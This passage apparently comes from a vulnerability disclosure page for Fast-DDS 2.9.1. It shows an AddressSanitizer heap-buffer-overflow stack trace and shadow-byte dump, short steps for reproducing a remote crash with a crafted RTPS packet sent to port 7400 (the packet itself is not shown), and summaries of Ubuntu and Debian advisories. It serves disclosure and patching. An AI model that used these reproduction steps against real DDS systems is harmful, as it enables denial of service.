    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)

Thread T3 created by T0 here:
    #0 0x4c376c in pthread_create (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4c376c)
    #1 0x7f2e0014a0a8 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd70a8)
    #2 0x7f2e012c1ed9 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp>&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:42:17
    #3 0x7f2e0131a8d2 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:234:41
    #4 0x7f2e0131a53c in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:60
    #5 0x7f2e012ead04 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPv4Transport.cpp:327:42
    #6 0x7f2e01171368 in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:43:40
    #7 0x7f2e01169b73 in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/NetworkFactory.cpp:74:81
    #8 0x7f2e0117a526 in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1680:60
    #9 0x7f2e01175fd2 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:355:28
    #10 0x7f2e01176bd8 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:449:87
    #11 0x7f2e01196fa8 in eprosima::fastrtps::rtps::RTPSDomainImpl::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:216:76
    #12 0x7f2e011961d5 in eprosima::fastrtps::rtps::RTPSDomain::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:88:45
    #13 0x7f2e0127add3 in eprosima::fastdds::dds::DomainParticipantImpl::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantImpl.cpp:269:45
    #14 0x7f2e012a08e5 in eprosima::fastdds::dds::DomainParticipant::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipant.cpp:110:43
    #15 0x7f2e0126e9d9 in eprosima::fastdds::dds::DomainParticipantFactory::create_participant(unsigned int, eprosima::fastdds::dds::DomainParticipantQos const&, eprosima::fastdds::dds::DomainParticipantListener*, eprosima::fastdds::dds::StatusMask const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantFactory.cpp:187:58
    #16 0x557885 in HelloWorldSubscriber::init() (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x557885)
    #17 0x564840 in main (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x564840)
    #18 0x7f2dffd39082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522) in memcpy
Shadow bytes around the buggy address:
  0x0c047fffebb0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
  0x0c047fffebc0: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 fa
  0x0c047fffebd0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fffebe0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 fa
  0x0c047fffebf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fffec00: fa fa 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc

Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.

This can remotely crash any Fast-DDS process.

Related news

Ubuntu Security Notice USN-6306-1

Ubuntu Security Notice 6306-1 - It was discovered that Fast DDS incorrectly handled certain inputs. A remote attacker could possibly use this issue to cause a denial of service and information exposure. This issue only affected Ubuntu 22.04 LTS. It was discovered that Fast DDS incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash.

Debian Security Advisory 5481-1

Debian Linux Security Advisory 5481-1 - Multiple security issues were discovered in Fast DDS, a C++ implementation of the DDS (Data Distribution Service), which might result in denial of service or potentially the execution of arbitrary code when processing malformed RTPS packets.
